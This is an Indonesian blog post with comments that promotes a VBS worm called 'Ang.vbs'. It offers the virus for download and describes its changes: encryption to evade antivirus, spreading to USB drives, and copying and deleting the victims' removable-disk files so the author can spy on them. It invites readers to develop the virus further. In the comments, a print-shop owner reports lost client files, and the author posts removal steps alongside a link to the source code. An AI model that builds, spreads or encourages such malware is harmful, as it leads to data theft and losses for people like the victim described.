Darkside of Oktavianus

Making virus and all of them as our friends

Virus Ang.Vbs by Ariyanto

Posted by oktavianus pada November 10, 2008

Donlot virus ANG.vbs

Download aja pd Link di atas.

Versi virus Ang.vbs yang belum terenkripsi bisa terdeteksi sama PC Media, tapi
sekarang sudah saya modifikasi. Nih dia modifikasinya:

Ang versi baru menghapus file autorun.inf dan *.vbs pada setiap drive,
dengan tujuan mencegah dan menghambat perkembangan dan penyebaran
virus vbs lain pada komputer. kemudian menyebarkan anak virus Ang itu
sendiri ke setiap Removable disc (kecuali A:\).

Tak hanya itu, Ang versi baru selain dienkrip, sekarang sudah saya
modifikasi menjadi virus yang mengkopi seluruh data yang ada pada
Removable disc ke dalam direktori “windows\system32\RemovableCache?”,
setelah mengkopi kemudian FILE yang ada pada direktori muka dari
removable disc akan dihapus (ingat: hanya file yang ada di direktori
muka), folder dan file yang ada di direktori subfolder masih tetap
aman.

Dengan begitu, VM (Virus Maker) bisa memata-matai data pada
flashdisc/memori punya orang lain. Hahaha…..

Tapi jangan kuatir, file yang dihapus tadi masih kita simpan kan pada
direktori Windows yang telah kita bahas tadi.

Virus Ang ini gak akan memata-matai direktori lain selain removable
disc, jadi direktori yang lain masih tetep aman. Untuk menghindari
pengkopian pada removable disc, kita simpan saja ‘FILE KUNCI’ pada
direktori muka flashdisc untuk menghindari pengkopian. Pada contoh
Virus yang saya kasih ini file kuncinya adalah
“The_Legend_of_Aang.vbs” atau nama file virus itu sendiri. Jadi setiap
flashdisc yang dicolokkan ke komputer yang terinfeksi virus ini, maka
filenya akan dikopi, kecuali flashdisc yang ada FILE KUNCInya.

Virus yang saya kasih ini masih minim akan teknologi, maka dari itu
gak usah banyak ngomong, CEPET KEMBANGIN ya! Abis itu kasih DUIT ke
saya……… (Heee…. cuma becanda, tapi kalo beneran ngasih duit
juga gak papa), maksud saya Kasih KABAR ke saya, jangan lupa………

Yours
Ariyanto
www.ariyanto.de.tl
riyanto.mail@gmail.com

7 Tanggapan to “Virus Ang.Vbs by Ariyanto”

  1. Ariyanto said

    Fans berat ya?

  2. uiui said

    tetap aja virus.. parahnya lagi itu virus bisa nyolong data orang

  3. Hendrik said

    Halo Ariyanto

    Bagaimanakah untuk mendelete virus ini ??
    Saya terinfeksi virus ini dan file .vbs nya berada di windows system 32 master komputer saya.

    Saya membuka usaha digital printing dimana setiap pelanggan biasanya menggunakan usb mereka untuk mentransfer file ke komputer saya dan saya edit untuk di print di mesin.

    Saya hanya ingin memberitahukan bahwa karena file di usb mereka terhapus (atau dalam hal ini dicopy ke removable cache saya) maka banyak sekali orderan yang dibatalkan. Dan setelah dicolokkan ke komputer saya, biasanya usb mereka pun mendapatkan/terinfeksi file the_legend_of_aang.vbs dimana setiap kali di delete, maka akan ada lagi. Apakah ini artinya itu ‘file kunci’ ?? Jadi file2 client saya hilang secara permanen ?

    Banyak sekali client yang marah dan kecewa yang menyalahkan saya atas hilangnya file2 penting mereka. Apakah ini sudah dipikirkan kamu terlebih dahulu pada saat menciptakan virus ?? Kamu ingin recognition atas kreativitas kamu ?? Saya salut atas kepintaran anda tapi mengapa harus menyulitkan dan merugikan banyak orang??

    Tolong beritahu saya cara untuk mendelete virus ini sesegera mungkin karena jika memformat ulang master komputer saya, itu bukan suatu option yang sulit ditengah2 jam kerja. Saya coba untuk mendelete file nya di system 32 namun tetap tidak bisa.

  4. Ariyanto said

    Kenapa Kamu ga hubungi saya lewat imel?

    Aku kan baru baca ini sekarang jadinya!

    Hehehe…… maaf ya………………..

  5. Ariyanto said

    Silakan kirimkan pertanyaan, kritik dan saran, caci dan makian kamu lewat imel di:

    —-
    riyanto.mail@gmail.com
    —-

    Jika kamu ingin memberikan pujian, silakan kamu panjatkan pada Tuhan yang Maha Esa

  6. Ariyanto said

    Aku minta maaf buat kmu-kamu yang udah dibuat susah oleh virus ini iia…..
    Tulisan ini adalah bentuk permintaan maaf saya.

    Silakan kopi dan sebarluaskan iia………………………………………………

    ———————

    Kamu kesal dengan virus ini yang mengkopi seluruh data yang ada di flashdisk kamu ke dalam sistem, hahaha….. jangan takut, berikut ini adalah langkah umum untuk memusnahkan virus tersebut.

    Cara Mudah Menghapus Virus Ang.vbs :

    Ikuti langkah-langkah dibawah ini :

    1. Buka Explorer (Klik kanan pada start kemudian explorer)
    2. Setelah explorer kebuka, buka direktori C:\WINDOWS\system32\RemovableCache
    3. Itu adalah direktori tempat penyimpanan file-file yang telah dipindahkan oleh virus tersebut dari media penyimpanan seperti flashdisk.
    4. Setelah itu jalankan RUN (Start-RUN) kemudian ketik CMD untuk masuk ke dos mode. kemudian masuk ke direktori C:\WINDOWS\system32\
    5. Apabila anda berada di direktori C:\Documents and settings\users anda bisa keluar dulu dengan cara mengetikan “cd..” tanpa kutip sebanyak 2x kemudian masuk ke direktori tadi dengan cara mengetik “cd windows” kemudian “cd system32” tanpa tanda kutip.
    6. Setelah sampai pada tahapan itu, biarkan sementara. Kemudian anda buka task manager (Ctrl+Alt+del) kemudian ke proses lalu destroy/end process “wbscript.exe”
    7. Setelah di end process maka kita kembali ke DOS Prompt kemudian ketikan “del aang.vbs” tanpa tanda kutip.
    8. Maka virus tersebut telah terhapus….
    9. Cukup mudah kan..
    10. Selamat mencoba.

    Lain halnya untuk yang hobi membuat dan mengkoleksi virus virus, download source kode virus ini di:

    ariyanto.multiply.com/tag/virus

    Yours
    Ariyanto
    riyanto.mail@gmail.com

  7. iwenk said

    hahhah…..benar2 bertanggung jawab…
    Ampe ngasih cara ngedelete virusnya juga..
    makasih mas….
    Sukses….

Tinggalkan Balasan

 
